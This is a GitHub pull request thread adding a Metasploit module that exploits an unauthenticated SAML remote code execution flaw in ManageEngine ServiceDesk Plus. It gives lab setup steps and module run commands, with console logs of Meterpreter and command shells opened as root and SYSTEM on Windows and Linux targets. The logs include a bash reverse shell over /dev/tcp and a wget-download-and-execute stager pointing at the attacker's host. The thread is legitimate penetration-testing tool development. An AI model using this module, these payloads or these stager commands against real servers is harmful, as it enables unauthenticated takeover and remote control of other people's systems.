
ManageEngine ServiceDesk Plus RCE (CVE-2022-47966) #17527

Merged
6 commits merged Feb 6, 2023

Conversation

@cdelafuente-r7 (Contributor) commented Jan 24, 2023

This exploits an unauthenticated remote code execution vulnerability that affects Zoho ManageEngine ServiceDesk Plus versions 14003 and below (CVE-2020-0646). Due to a dependency on an outdated library (Apache Santuario version 1.4.1), it is possible to execute arbitrary code by providing a crafted samlResponse XML to the ServiceDesk Plus SAML endpoint. Note that the target is only vulnerable if it has been configured with SAML-based SSO at least once in the past, regardless of the current SAML-based SSO status.

Installation

SAML 2.0 Identity Provider

If you don't already have a SAML 2.0 Identity Provider (IdP), you can use this free one for testing: https://mocksaml.com/

Save the certificate to a local file (e.g. cert.cer) and take note of the SSO URL (https://mocksaml.com/api/saml/sso).

Download the installers

Go to https://archives.manageengine.com/, fill in the form with any data and select the ServiceDesk Plus product with any version (e.g. 14003). You will then have access to all the versions and platform installers.

Windows

  1. Launch the Windows installer and select all the default options by clicking Next (you can skip the Registration for Technical Support part, it is optional). When the installation is done, select Start ServiceDesk Server and click Finish
  2. Go to C:\Program Files\ManageEngine\ServiceDesk\bin\ and run SDPLaunch. This will start a browser and get you to the login page.

Linux (Ubuntu)

  1. Make the installer executable by executing chmod +x <linux_installer>.bin
  2. Launch the Linux installer as root, select all the default options by clicking Next until you reach the installation path page.
  3. Change the installation path to somewhere other than under /root/ (it doesn't work with this default path) and finish the installation. You might get an error 'Problem in initializing Postgres'; just ignore it, click OK and finish the installation. We'll fix this in the next step.
  4. If you got the Postgres error in the last step, go to the installation base path (e.g. '/opt/ManageEngine/ServiceDesk/') and run the following commands as root:
    • cp tools/postgres/bin/gettimezone tools/postgres/bin/gettimezone_32
    • cp tools/postgres/bin/gettimezone_64 tools/postgres/bin/gettimezone
    • cd bin
    • ./initPgsql.sh
  5. Start the server by running run.sh as root

Enable SAML 2.0 SSO

  1. Go to http://localhost:8080
  2. Select Log in as Administrator.
  3. Go to http://localhost:8080/app#/admin and click on SAML Single Sign On in the Users & Permission section.
  4. In Configure Identity Provider Details, set the SSO URL from the IdP (e.g. https://mocksaml.com/api/saml/sso), set the Name ID Format to Unspecified, the Algorithm to RSA_SHA1 and select the IdP certificate file (e.g. cert.cer).
  5. In Additional Claims > Default Fields, set the Login Name to any value.
  6. Click Save
  7. Enable SSO by switching the Enable SAML Single Sign-On ? button on the top of the page.

Verification Steps

  1. Start msfconsole
  2. Do: use multi/http/manageengine_servicedesk_plus_saml_rce_cve_2022_47966
  3. Do: exploit rhosts=<remote host IP> lhost=<local host IP>
  4. You should get a shell
  5. Also test with other targets against Windows and Linux

Scenarios

ServiceDesk Plus version 14003 on Windows - Target 1 (Windows Command)

msf6 exploit(multi/http/manageengine_servicedesk_plus_saml_rce_cve_2022_47966) > exploit rhosts=192.168.100.104 lhost=192.168.100.1
[*] Started reverse TCP handler on 192.168.100.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[*] Sending stage (175686 bytes) to 192.168.100.104
[*] Meterpreter session 1 opened (192.168.100.1:4444 -> 192.168.100.104:51417) at 2023-01-26 12:07:43 +0100
meterpreter > sysinfo
Computer        : DESKTOP-26CQRHP
OS              : Windows 10 (10.0 Build 22000).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/windows
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

ServiceDesk Plus version 14003 on Windows - Target 0 (Windows EXE Dropper)

msf6 exploit(multi/http/manageengine_servicedesk_plus_saml_rce_cve_2022_47966) > set target 0
target => 0
msf6 exploit(multi/http/manageengine_servicedesk_plus_saml_rce_cve_2022_47966) > exploit rhosts=192.168.100.104 lhost=192.168.100.1
[*] Started reverse TCP handler on 192.168.100.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[*] Command Stager progress -  17.01% done (2046/12025 bytes)
[*] Command Stager progress -  34.03% done (4092/12025 bytes)
[*] Command Stager progress -  51.04% done (6138/12025 bytes)
[*] Command Stager progress -  68.06% done (8184/12025 bytes)
[*] Command Stager progress -  84.24% done (10130/12025 bytes)
[*] Sending stage (200774 bytes) to 192.168.100.104
[*] Meterpreter session 2 opened (192.168.100.1:4444 -> 192.168.100.104:51435) at 2023-01-26 12:08:42 +0100
[*] Command Stager progress - 100.00% done (12025/12025 bytes)
meterpreter > sysinfo
Computer        : DESKTOP-26CQRHP
OS              : Windows 10 (10.0 Build 22000).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/windows
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

ServiceDesk Plus version 14003 on Linux (Ubuntu) - Target 2 (Unix Command)

msf6 exploit(multi/http/manageengine_servicedesk_plus_saml_rce_cve_2022_47966) > set target 2
target => 2
msf6 exploit(multi/http/manageengine_servicedesk_plus_saml_rce_cve_2022_47966) > exploit rhosts=192.168.100.109 lhost=192.168.100.1
[*] Started reverse TCP handler on 192.168.100.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[*] Sending stage (24380 bytes) to 192.168.100.109
[*] Meterpreter session 1 opened (192.168.100.1:4444 -> 192.168.100.109:43062) at 2023-01-26 16:07:21 +0100
meterpreter > sysinfo
Computer        : ubuntu
OS              : Linux 5.15.0-58-generic #64~20.04.1-Ubuntu SMP Fri Jan 6 16:42:31 UTC 2023
Architecture    : x64
System Language : en_US
Meterpreter     : python/linux
meterpreter > getuid
Server username: root

ServiceDesk Plus version 14003 on Linux (Ubuntu) - Target 3 (Linux Dropper)

msf6 exploit(multi/http/manageengine_servicedesk_plus_saml_rce_cve_2022_47966) > set target 3
target => 3
msf6 exploit(multi/http/manageengine_servicedesk_plus_saml_rce_cve_2022_47966) > exploit rhosts=192.168.100.109 lhost=192.168.100.1
[*] Started reverse TCP handler on 192.168.100.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[*] Using URL: http://192.168.100.1:8080/55oyjyc1i
[*] Client 192.168.100.109 (curl/7.68.0) requested /55oyjyc1i
[*] Sending payload to 192.168.100.109 (curl/7.68.0)
[*] Sending stage (3045348 bytes) to 192.168.100.109
[*] Meterpreter session 2 opened (192.168.100.1:4444 -> 192.168.100.109:40138) at 2023-01-26 16:09:37 +0100
[*] Command Stager progress - 100.00% done (115/115 bytes)
[*] Server stopped.
meterpreter > sysinfo
Computer     : 192.168.100.109
OS           : Ubuntu 20.04 (Linux 5.15.0-58-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > getuid
Server username: root

@github-actions

Thanks for your pull request! Before this can be merged, we need the following documentation for your module:

@h00die-gr3y (Contributor)

@cdelafuente-r7 Cool stuff!
Tested your module against ManageEngine ServiceDesk Plus 14002 running on Windows Datacenter 2019. I can confirm that both PowerShell payloads and the Windows EXE dropper are working fine.
Took the opportunity to also test your module against a Linux target: ManageEngine ServiceDesk Plus 14002 running on Ubuntu 22.04.

Works well with reverse_bash, reverse_netcat, python meterpreter and other python payloads with the following code additions:
[-] Add the additional BadChars \x20 to the Linux and Unix targets: 'Payload' => { 'BadChars' => "\x27\x20" },
[-] Update the code below in your execute_command

  def execute_command(cmd, _opts = {})
    # Wrap the command in the platform's shell so the cmdstager output runs as-is
    case target['Type']
    when :windows_dropper
      cmd = "cmd /c #{cmd}"
    when :unix_cmd, :linux_dropper
      cmd = "bash -c #{cmd}"
    end
    # ... rest of the method (building and sending the SAML response) unchanged
  end

Linux dropper does not work yet...

msf6 exploit(multi/http/manageengine_servicedesk_plus_saml_rce_cve_2022_47966) > set payload cmd/unix/reverse_bash
payload => cmd/unix/reverse_bash
msf6 exploit(multi/http/manageengine_servicedesk_plus_saml_rce_cve_2022_47966) > exploit

[*] Started reverse TCP handler on 192.168.100.7:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[*] Command shell session 26 opened (192.168.100.7:4444 -> 192.168.100.18:39520) at 2023-01-25 18:40:33 +0000

uname -a
Linux cuckoo 5.15.0-58-generic #64-Ubuntu SMP Thu Jan 5 11:43:13 UTC 2023 x86_64 x86_64 x86_64 GNU/Linux
whoami
root
msf6 exploit(multi/http/manageengine_servicedesk_plus_saml_rce_cve_2022_47966) > set payload cmd/unix/reverse_netcat
payload => cmd/unix/reverse_netcat
msf6 exploit(multi/http/manageengine_servicedesk_plus_saml_rce_cve_2022_47966) > exploit

[*] Started reverse TCP handler on 192.168.100.7:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[*] Command shell session 27 opened (192.168.100.7:4444 -> 192.168.100.18:39012) at 2023-01-25 19:00:04 +0000

uname -a
Linux cuckoo 5.15.0-58-generic #64-Ubuntu SMP Thu Jan 5 11:43:13 UTC 2023 x86_64 x86_64 x86_64 GNU/Linux
id
uid=0(root) gid=0(root) groups=0(root)
msf6 exploit(multi/http/manageengine_servicedesk_plus_saml_rce_cve_2022_47966) > set payload cmd/unix/python/meterpreter/reverse_tcp
payload => cmd/unix/python/meterpreter/reverse_tcp
msf6 exploit(multi/http/manageengine_servicedesk_plus_saml_rce_cve_2022_47966) > exploit

[*] Started reverse TCP handler on 192.168.100.7:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[*] Sending stage (24380 bytes) to 192.168.100.18
[*] Meterpreter session 29 opened (192.168.100.7:4444 -> 192.168.100.18:54256) at 2023-01-25 19:04:25 +0000

meterpreter > sysinfo
Computer        : cuckoo
OS              : Linux 5.15.0-58-generic #64-Ubuntu SMP Thu Jan 5 11:43:13 UTC 2023
Architecture    : x64
System Language : en_US
Meterpreter     : python/linux
meterpreter > getuid
Server username: root
meterpreter >

Another suggestion is maybe to add a native java payload in your XSLT
There is a nice reference on the topic and you can find it here

Looking forward to seeing your module land soon!

@cdelafuente-r7 (Contributor, Author)

Thanks @h00die-gr3y for looking into this! I managed to install a Linux target and added your suggestions. It works great! I had to do some updates to make it work with a Linux Dropper target.

@cdelafuente-r7 cdelafuente-r7 marked this pull request as ready for review January 26, 2023 15:19
@cdelafuente-r7 (Contributor, Author)

Thanks @smcintyre-r7 ! I added randomisation to the XML in ed2dd2f. I also fixed an issue with BadChars not handled correctly by the cmdstager in the same commit.

@h00die-gr3y (Contributor) commented Jan 26, 2023

@cdelafuente-r7 Quick question for you: This module covers ManageEngine ServiceDesk Plus targets; however, the SAML RCE applies to a broad range of other ManageEngine products. Today I tested most of your code base against a vulnerable ManageEngine Endpoint Central target and the RCE works, except of course for your check code.
So what would be the approach here? A separate module per product or make a more general module that covers multiple ManageEngine products with the same SAML RCE?

@cdelafuente-r7 (Contributor, Author)

@h00die-gr3y, I had the exact same question! For now, I think separate modules is good enough, but we can think about another option later. Feel free to reuse this code and submit separate modules for other affected products. That would be great, actually!

BTW, I just submitted a PR for ADSelfService Plus: #17556.

@h00die-gr3y (Contributor) commented Jan 27, 2023

@cdelafuente-r7 I have some suggestions to improve your check logic.
You are now checking only the build version and the 400 HTTP response to determine if the target is vulnerable.
This actually creates a lot of false positives, because SAML should be active or should have been configured in the past for the exploit to work. See the vendor advisory.

So I have a code suggestion to improve the check. You can use the endpoint SamlRequestServlet to determine if SAML is active. It returns a 302 HTTP redirect response with a Location header containing the SAML request.
With this response you can check that SAML is active and, together with your build information, determine if the target is exploitable.
Unfortunately there is no way to check if SAML has been configured in the past and is now disabled, but you can provide guidance in your check logic to inform the user about this.

Here is the code suggestion, feel free to change because I am not a ruby expert.

  def check_saml_enabled
    res = send_request_cgi({
      'method' => 'GET',
      'uri' => normalize_uri('/SamlRequestServlet')
    })
    # Servers with SAML enabled respond with a 302 whose Location header carries the SAML request
    return false unless res && res.code == 302

    # Guard against a redirect without a Location header
    res.headers['Location'].to_s.include?('SAMLRequest=')
  end

and add this after your checks on the build version.

    # check if SAML is enabled and active
    if check_saml_enabled
      CheckCode::Vulnerable("Build is #{info[:build]}")
    else
      CheckCode::Appears("SAML is not enabled, but build #{info[:build]} is still exploitable if SAML was configured in the past.")
    end

Check it out in your lab...

And one more suggestion, you might want to introduce a lower limit check on the build version.
SAML SSO got introduced in build 10511 for the on-premises version according to what I could find on the Internet.

@cdelafuente-r7 (Contributor, Author)

Thanks for your suggestions @h00die-gr3y. The Vulnerable check code can only be used if the vulnerability has been actively confirmed. In this case, the build number and SAML enabled are not enough and it should be Appears check code too.

    if check_saml_enabled
      CheckCode::Appears("Build is #{info[:build]}")
    else
      CheckCode::Appears("SAML is not enabled, but build #{info[:build]} is still exploitable if SAML was configured in the past.")
    end

So, in both cases, we end up with the same check code and the execution of the exploit. The only difference is that the user knows whether SAML is enabled or not. They will have to run the exploit to find out if it is exploitable anyway. I'm not sure this extra information is useful here, or whether it is worth sending one more request for it.

That said, I will add the minimum build number check. Thanks for the suggestion!
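As an added example (not the module's own code), the check logic discussed in the exchange above, modelled stand-alone: the build window suggested earlier (SAML SSO introduced in build 10511, 14003 the last affected build) combined with the SamlRequestServlet 302/SAMLRequest= signal, returning an Appears result in both the enabled and disabled cases as the reply concludes. The HttpResponse struct, the assess helper and the inclusive range bounds are assumptions, and network I/O is replaced by constructed responses so it runs offline.

```ruby
# Added example, not the Metasploit module's code: offline model of the
# "is this ServiceDesk Plus instance in the exposed range?" decision, useful
# for triaging your own installs from a build number and one probe result.

# Stand-in for the HTTP response object a module gets back from
# send_request_cgi (assumption: only the status code and headers are used).
HttpResponse = Struct.new(:code, :headers)

# Build numbers quoted in the thread. Assumption: both bounds are inclusive.
MIN_SAML_BUILD = 10511   # SAML SSO first available in the on-premises build
MAX_VULN_BUILD = 14003   # last affected build per the PR description

# True when the SamlRequestServlet probe shows SAML SSO is currently active:
# a 302 redirect whose Location header carries the SAMLRequest parameter.
# Handles a nil response (timeout), non-302 codes and a missing header.
def check_saml_enabled?(res)
  return false unless res && res.code == 302

  location = (res.headers || {}).fetch('Location', '').to_s
  location.include?('SAMLRequest=')
end

# Accepts the raw build string and returns an Integer, or nil when it is
# absent or not purely numeric (e.g. a banner that could not be parsed).
def parse_build(raw)
  return nil if raw.nil?

  s = raw.to_s.strip
  s.match?(/\A\d+\z/) ? s.to_i : nil
end

# Returns [status, message] where status mirrors the Metasploit check codes
# discussed in the thread as plain symbols: :safe, :appears or :unknown.
# Neither branch yields :vulnerable, because a build number plus SAML state
# does not actively confirm the bug; only a successful run would.
def assess(raw_build, saml_res)
  build = parse_build(raw_build)
  return [:unknown, "Could not determine the build number (#{raw_build.inspect})"] if build.nil?

  if build < MIN_SAML_BUILD
    return [:safe, "Build #{build} predates SAML SSO support (added in #{MIN_SAML_BUILD})"]
  end
  if build > MAX_VULN_BUILD
    return [:safe, "Build #{build} is later than the last affected build #{MAX_VULN_BUILD}"]
  end

  if check_saml_enabled?(saml_res)
    [:appears, "Build #{build} is in the affected range and SAML SSO is currently enabled"]
  else
    [:appears, "Build #{build} is in the affected range; SAML SSO is not enabled now, " \
               'but the instance is still exposed if SAML was ever configured']
  end
end

if $PROGRAM_NAME == __FILE__
  # Constructed sample probe results, not captured from a real server.
  enabled  = HttpResponse.new(302, { 'Location' => 'https://idp.example/sso?SAMLRequest=ZmFrZQ==' })
  disabled = HttpResponse.new(200, { 'Content-Type' => 'text/html' })
  [['14003', enabled], ['14003', disabled], ['14004', enabled], ['10510', enabled], [nil, nil]].each do |b, r|
    status, msg = assess(b, r)
    puts "#{b.inspect}: #{status} - #{msg}"
  end
end
```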

@h00die-gr3y (Contributor)

@cdelafuente-r7 One more point: why are you referring to CVE-2020-0646 instead of referencing CVE-2022-47966?
Is it a copy error or am I missing something here?

@cdelafuente-r7 (Contributor, Author)

Good catch @h00die-gr3y! It is a bad copy/paste. Thanks for the heads up!

@bwatters-r7 bwatters-r7 self-assigned this Jan 30, 2023
Review comment on the module documentation:

    1. Start the server running `run.sh`

    ### Enable SAML 2.0 SSO
    1, Go to `http://localhost:8080`

Suggested change:

    1, Go to `http://localhost:8080`
    1. Go to `http://localhost:8080`

@bwatters-r7 (Contributor)

msf6 exploit(multi/http/manageengine_servicedesk_plus_saml_rce_cve_2022_47966) > show options

Module options (exploit/multi/http/manageengine_servicedesk_plus_saml_rce_cve_2022_47966):

   Name       Current Setting       Required  Description
   ----       ---------------       --------  -----------
   DELAY      5                     yes       Number of seconds to wait between each request
   Proxies                          no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                           yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
   RPORT      8080                  yes       The target port (TCP)
   SRVHOST    10.5.135.201          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT    8080                  yes       The local port to listen on.
   SSL        false                 no        Negotiate SSL/TLS for outgoing connections
   SSLCert                          no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI  /SamlResponseServlet  yes       The SAML endpoint URL
   URIPATH                          no        The URI to use for this exploit (default is random)
   VHOST                            no        HTTP server virtual host


Payload options (cmd/windows/powershell/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     10.5.135.201     yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   1   Windows Command



View the full module info with the info, or info -d command.

msf6 exploit(multi/http/manageengine_servicedesk_plus_saml_rce_cve_2022_47966) > set rhost 10.5.134.167
rhost => 10.5.134.167
msf6 exploit(multi/http/manageengine_servicedesk_plus_saml_rce_cve_2022_47966) > check
[*] 10.5.134.167:8080 - The target appears to be vulnerable.
msf6 exploit(multi/http/manageengine_servicedesk_plus_saml_rce_cve_2022_47966) > run

[*] Powershell command length: 4148
[*] Started reverse TCP handler on 10.5.135.201:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[*] Sending stage (175686 bytes) to 10.5.134.167
[*] Meterpreter session 1 opened (10.5.135.201:4444 -> 10.5.134.167:52102) at 2023-02-03 09:18:41 -0600

meterpreter > sysinfo
Computer        : DESKTOP-D1E425Q
OS              : Windows 10 (10.0 Build 17134).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/windows
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 10.5.134.167 - Meterpreter session 1 closed.  Reason: Died
msf6 exploit(multi/http/manageengine_servicedesk_plus_saml_rce_cve_2022_47966) > set target 0
target => 0
msf6 exploit(multi/http/manageengine_servicedesk_plus_saml_rce_cve_2022_47966) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf6 exploit(multi/http/manageengine_servicedesk_plus_saml_rce_cve_2022_47966) > show options

Module options (exploit/multi/http/manageengine_servicedesk_plus_saml_rce_cve_2022_47966):

   Name       Current Setting       Required  Description
   ----       ---------------       --------  -----------
   DELAY      5                     yes       Number of seconds to wait between each request
   Proxies                          no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS     10.5.134.167          yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
   RPORT      8080                  yes       The target port (TCP)
   SRVHOST    10.5.135.201          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT    8080                  yes       The local port to listen on.
   SSL        false                 no        Negotiate SSL/TLS for outgoing connections
   SSLCert                          no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI  /SamlResponseServlet  yes       The SAML endpoint URL
   URIPATH                          no        The URI to use for this exploit (default is random)
   VHOST                            no        HTTP server virtual host


Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     10.5.135.201     yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Windows EXE Dropper



View the full module info with the info, or info -d command.

msf6 exploit(multi/http/manageengine_servicedesk_plus_saml_rce_cve_2022_47966) > run

[*] Started reverse TCP handler on 10.5.135.201:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
<cmd stager removed>
[*] Command Stager progress -  17.01% done (2046/12025 bytes)
[*] Command Stager progress -  34.03% done (4092/12025 bytes)
[*] Command Stager progress -  51.04% done (6138/12025 bytes)
[*] Command Stager progress -  68.06% done (8184/12025 bytes)
[*] Command Stager progress -  84.24% done (10130/12025 bytes)
[*] Sending stage (200774 bytes) to 10.5.134.167
[*] Meterpreter session 2 opened (10.5.135.201:4444 -> 10.5.134.167:52103) at 2023-02-03 09:22:12 -0600
[*] Command Stager progress - 100.00% done (12025/12025 bytes)

meterpreter > sysinfo
Computer        : DESKTOP-D1E425Q
OS              : Windows 10 (10.0 Build 17134).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/windows
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > 

@bwatters-r7 (Contributor)

Linux Cmd:

msf6 exploit(multi/http/manageengine_servicedesk_plus_saml_rce_cve_2022_47966) > run

[+] bash -c '0<&54-;exec 54<>/dev/tcp/10.5.135.201/4444;sh <&54 >&54 2>&54'
[*] Started reverse TCP handler on 10.5.135.201:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[*] Command shell session 1 opened (10.5.135.201:4444 -> 10.5.134.129:37134) at 2023-02-06 15:41:08 -0600

ifconfig
ens32: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 10.5.134.129  netmask 255.255.255.0  broadcast 10.5.134.255
        ether 00:0c:29:93:02:de  txqueuelen 1000  (Ethernet)
        RX packets 357364  bytes 526022072 (526.0 MB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 61456  bytes 4953132 (4.9 MB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10<host>
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 372621  bytes 152414081 (152.4 MB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 372621  bytes 152414081 (152.4 MB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

whoami
root

Linux Dropper

msf6 exploit(multi/http/manageengine_servicedesk_plus_saml_rce_cve_2022_47966) > show options

Module options (exploit/multi/http/manageengine_servicedesk_plus_saml_rce_cve_2022_47966):

   Name       Current Setting       Required  Description
   ----       ---------------       --------  -----------
   DELAY      5                     yes       Number of seconds to wait between each request
   Proxies                          no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS     10.5.134.129          yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
   RPORT      8080                  yes       The target port (TCP)
   SRVHOST    10.5.135.201          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT    8989                  yes       The local port to listen on.
   SSL        false                 no        Negotiate SSL/TLS for outgoing connections
   SSLCert                          no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI  /SamlResponseServlet  yes       The SAML endpoint URL
   URIPATH                          no        The URI to use for this exploit (default is random)
   VHOST                            no        HTTP server virtual host


Payload options (linux/x64/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  10.5.135.201     yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   3   Linux Dropper



View the full module info with the info, or info -d command.

msf6 exploit(multi/http/manageengine_servicedesk_plus_saml_rce_cve_2022_47966) > run

[*] Started reverse TCP handler on 10.5.135.201:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[*] Using URL: http://10.5.135.201:8989/menXB0nb
[*] Generated command stager: ["wget -qO /tmp/EEuXCKuh http://10.5.135.201:8989/menXB0nb;chmod +x /tmp/EEuXCKuh;/tmp/EEuXCKuh;rm -f /tmp/EEuXCKuh"]
[*] Client 10.5.134.129 (Wget/1.21.2) requested /menXB0nb
[*] Sending payload to 10.5.134.129 (Wget/1.21.2)
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3045348 bytes) to 10.5.134.129
[*] Meterpreter session 4 opened (10.5.135.201:4444 -> 10.5.134.129:37140) at 2023-02-06 16:22:40 -0600
[*] Command Stager progress - 100.00% done (113/113 bytes)
[*] Server stopped.

meterpreter > sysinfo
Computer     : 10.5.134.129
OS           : Ubuntu 22.04 (Linux 5.15.0-43-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > getuid
Server username: root
meterpreter > 

@bwatters-r7 bwatters-r7 merged commit 53c6765 into rapid7:master Feb 6, 2023
@bwatters-r7 (Contributor)

Release Notes

This adds an unauthenticated remote code execution vulnerability that affects Zoho ManageEngine ServiceDesk Plus versions 14003 and below (GHSA-4w3v-83v8-mg94).

@gwillcox-r7 gwillcox-r7 added the rn-modules release notes for new or majorly enhanced modules label Feb 8, 2023
@gwillcox-r7 (Contributor)

Tagging this rn-modules since this was also missing the tag in preparation for tomorrow's release.
